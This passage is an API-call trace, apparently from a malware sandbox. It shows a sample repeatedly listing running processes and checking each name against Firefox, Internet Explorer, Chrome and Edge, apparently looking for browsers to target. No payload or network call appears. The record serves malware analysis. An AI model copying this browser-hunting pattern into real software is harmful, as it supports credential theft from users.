[0180.260] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0180.260] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0180.261] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0180.261] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0180.261] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0180.261] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0180.261] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0180.261] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0180.261] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0180.261] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0180.262] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0180.262] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0180.262] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0180.262] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.262] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0180.262] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0180.263] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0180.263] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0180.263] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0180.263] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0180.263] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0180.263] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0180.263] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0180.264] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0180.264] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0180.264] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0180.264] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0180.264] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0180.264] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0180.264] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0180.264] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0180.265] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0180.265] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0180.265] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0180.265] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0180.265] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0180.265] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0180.265] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0180.265] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0180.266] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0180.266] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0180.266] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0180.266] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.266] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0180.267] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0180.267] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0180.267] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0180.267] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.267] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0180.268] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0180.268] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0180.268] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0180.268] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0180.268] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0180.268] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0180.268] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0180.268] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0180.269] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0180.269] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0180.269] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0180.269] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0180.269] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0180.269] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0180.269] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0180.269] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0180.270] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0180.270] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0180.270] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0180.270] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.270] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0180.270] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0180.271] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0180.271] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0180.271] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0180.271] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0180.271] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0180.271] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0180.271] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0180.272] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0180.272] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0180.272] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0180.272] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.272] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0180.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0180.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0180.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.272] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.273] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.273] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.273] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.273] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.273] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0180.273] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0180.273] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0180.273] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0180.273] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.273] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.274] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.274] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.274] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.274] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.274] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0180.274] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0180.275] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0180.275] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0180.275] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.275] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.275] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.275] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.275] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.276] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.276] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.276] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.276] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.276] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0180.276] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0180.276] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0180.276] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0180.276] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.276] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.277] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0180.277] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0180.277] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0180.277] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.277] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.277] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.277] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.277] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.278] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.278] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.278] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.278] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.278] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.278] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.279] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.279] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.279] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.279] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0180.279] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0180.279] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0180.279] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0180.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0180.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0180.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0180.280] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0180.280] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0180.280] CloseHandle (hObject=0xd4) returned 1 [0180.280] Sleep (dwMilliseconds=0x3e8) [0181.305] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0181.307] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.307] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0181.307] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0181.307] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0181.307] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0181.308] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0181.308] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0181.308] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0181.308] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0181.308] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0181.308] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0181.309] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0181.309] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0181.309] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0181.309] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.309] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.309] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0181.309] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0181.309] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0181.309] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.309] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0181.310] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0181.310] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0181.310] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0181.310] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.310] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.310] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0181.310] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0181.310] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0181.310] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.310] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0181.311] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0181.311] lstrcmpiA 